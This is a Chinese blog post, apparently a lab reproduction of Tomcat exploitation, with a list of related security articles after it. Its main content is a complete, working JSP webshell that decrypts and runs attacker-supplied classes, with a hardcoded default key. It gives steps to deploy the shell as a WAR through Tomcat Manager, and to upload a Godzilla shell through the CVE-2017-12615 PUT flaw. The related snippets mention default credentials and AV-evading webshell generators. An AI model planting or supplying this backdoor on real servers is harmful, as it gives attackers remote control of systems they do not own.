Tomcat漏洞复现+哥斯拉利用

最新推荐文章于 2024-07-16 11:33:30 发布
最新推荐文章于 2024-07-16 11:33:30 发布
阅读量263 收藏
点赞数
分类专栏: 渗透 文章标签: tomcat java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NSQ0207/article/details/132475167
版权

 Tomcat 8

启动tomcat8漏洞

 将jsp木马保存到zip压缩包中,再修改后缀名为war上传

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

修改后缀名为war上传 

 上传war文件

 在manager/satus可以看到服务器状态

 冰蝎连接

 

Tomcat CVE-2017-12615

启动tomcat漏洞

哥斯拉利用-生成代码

生成哥斯拉代码 选择语言

 下载gsl.jsp文件

使用burpsuite抓包,修改GET为PUT上传方式,添加文件名gsl.jsp/,添加shell脚本

 

哥斯拉利用-连接 

 测试连接

连接成功

 

Serein_NSQ
关注
专栏目录
某赛通电子文档安全管理系统任意文件上传漏洞复现
0xSec
08-16 6089
某赛通电子文档安全管理系统UploadFileFromClientServiceForClient、/CDGServer3/DecryptApplicationService2、/CDGServer3/fileType/importFileType.do等接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 1111
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
哥斯拉jsp/jspx免杀webshell生成器
潇湘信安的博客
07-19 1182
本工具是根据“那些牛马那些事儿”一文中的本质马部分写的一个哥斯拉java类型webshell生成工具,已测试可过:360、火绒、D盾,其他的自己去测下。
tomcat-pass-getshell 弱口令
最新发布
qq_23003811的博客
07-16 272
通过弱口令登录后台,部署war包getshell‍,登录之后 上传一个war压缩包,先用哥斯拉生成一个jsp文件,然后压缩一下,把压缩包后缀改成war。然后在目录那里访问这个压缩包里面的jsp文件,如果正常访问,那么这个jsp文件就可以被哥斯拉连接。3、使用哥斯拉生成jsp木马1.jsp,压缩后重命令为war格式上传。2、输入弱口令tomcat/tomcat 登录成功(可以爆破)。1、访问页面,点击Manager App进行登录。4、访问地址无报错,说明上传成功。5、使用哥斯拉进行连接。
【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞
RexHa的博客
02-27 2622
漏洞原理:ActiveMQ中存储文件的fileserver接口支持写入文件,但是没有执行权限。可以通过MOVE文件至其他可执行目录下,从而实现文件写入并访问。ActiveMQ在5.12.x~5.13.x版本中,默认关闭了fileserver这个应用(但是可以在conf/jetty.xml中开启);在5.14.0版本以后,彻底删除了fileserver应用。访问8161端口默认账户密码admin/admin 登录文件上传成功需要有以下几点前提:知道文件上传的绝对路径网站有文件上传功能文件类型没有被限制上传的文
【后门工具】哥斯拉,YYDS#
10-09 1495
哥斯拉】生成、检测、连接木马,绝活
哥斯拉jsp马分析
zeros__的博客
12-27 6481
前言: 这篇文章分析了哥斯拉jsp马的特征原理,写这篇文章的原因是希望提高对哥斯拉马的识别、改造能力。 笔者接触安全的时间较短,难免会有疏漏,恳请发现问题的大佬给予指正。 哥斯拉PHP马解析可以看这篇文章: https://blog.csdn.net/zeros__/article/details/111521314 正文: 贴一下哥斯拉的jsp马: < % !String xc = "3c6e0b8a9c15224a"; String pass = "pass"; String md5 = md
服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现
ran的博客
05-13 2800
ISS中间件(Internet Security and Acceleration Server Middleware)是微软公司推出的一种安全中间件,旨在提供高效的安全代理服务和网络加速功能。它是Microsoft Proxy Server和Microsoft Firewall产品的继承者,也是Microsoft Forefront TMG(Threat Management Gateway)的前身。
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现
zz12345600354的博客
04-26 695
目录 服务攻防-框架安全&CVE 复现&Spring&Struts&Laravel&ThinkPHP * 概述 PHP-开发框架安全-Thinkphp&Laravel * 漏洞复现 * Thinkphp-3.X RCE Thinkphp-5.X RCE Laravel框架安全问题- CVE-2021-3129 RCE JAVAWEB-开发框架安全-Spring&Struts2 * Struts2框架安全
漏洞复现-用友UFIDA-YongYou系列
aming小老弟
10-03 1859
UFIDA是中国的一家知名企业软件公司,全称为用友软件股份有限公司(Yonyou Software Co . , Ltd . )。该公司成立于 1988 年,总部位于北京,是中国领先的企业管理软件和云服务提供商之一。UFIDA主要专注于开发和提供企业级软件解决方案,包括财务管理、人力资源管理、采购管理、销售管理、供应链管理、生产制造管理等。它的产品被广泛应用于各种行业,如制造业、服务业、金融业、医疗保健和公共事业等。UFIDA致力于帮助企业提高管理效率、优化业务流程,并提供数据分析和决策支持工具。
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1238
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
哥斯拉(Godzilla)下载与安装,使用木马连接教程
m0_70787202的博客
03-31 4143
1.哥斯拉下载与安装 2.哥斯拉自带木马添加数据测试连接
BUUCTF-Real-[Tomcat]CVE-2017-12615
分享
02-07 1135
CVE-2017-12615漏洞复现!只写了Linux版本的!
tomcat put方法任意写文件漏洞
weixin_48739941的博客
04-21 2890
(1)cd vulhub/tomcat/CVE-2017-12615 切换目录。 (2) docker-compose up -d 启动。 (3)访问:http://192.168.43.137:8080/ (4)burpsuite抓包。 (5)send to repeater,修改为PUT /l3yx.txt。 (6) docker exec -it 3e7 bash ; cd webapps/ ;cd ROOT ;cat l3yx.txt进入容器,查看。 ...
tomcat8 后台getshell漏洞复现
weixin_54786196的博客
09-03 310
打开哥斯拉 生成jsp木马并保存。在url栏加上jmuma.jsp。找到刚刚jsp木马存放的位置。此时复制连接,用哥斯拉连接。将zip后缀改为war。在此位置上传war包。
借助AI分析哥斯拉木马原理与Tomcat回显链路挖掘
m0_61101264的博客
09-22 198
本次分析使用了ChatGPT进行辅助分析,大大提升了工作效率,很快就分析出木马的工作流程和构造出利用方式。
Webshell免杀-JSP
qq_55787787的博客
10-15 3040
JSP免杀马的基本免杀方式。
【vulfocus】tomcat文件上传 (CVE-2017-12615)
RexHa的博客
10-17 1693
vulfocus靶场 tomcat-文件上传 名称: vulfocus/tomcat-cve_2017_12615:latest
python画图哥斯拉
03-17
Python中可以使用多种库来进行图形绘制,比如Matplotlib、Seaborn和Plotly等。如果你想要画一幅哥斯拉的图像,可以使用Matplotlib库来实现。 首先,你需要安装Matplotlib库。可以使用以下命令来安装: ``` pip install matplotlib ``` 接下来,你可以使用以下代码来画一幅哥斯拉的图像: ```python import matplotlib.pyplot as plt import matplotlib.image as mpimg # 读取哥斯拉的图像文件 img = mpimg.imread('godzilla.jpg') # 显示图像 plt.imshow(img) plt.axis('off') # 关闭坐标轴 plt.show() ``` 在上述代码中,我们使用了`mpimg.imread()`函数来读取哥斯拉的图像文件,并使用`plt.imshow()`函数来显示图像。`plt.axis('off')`用于关闭坐标轴的显示。最后,使用`plt.show()`函数来展示图像。 请注意,你需要将代码中的'godzilla.jpg'替换为你自己的哥斯拉图像文件路径。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值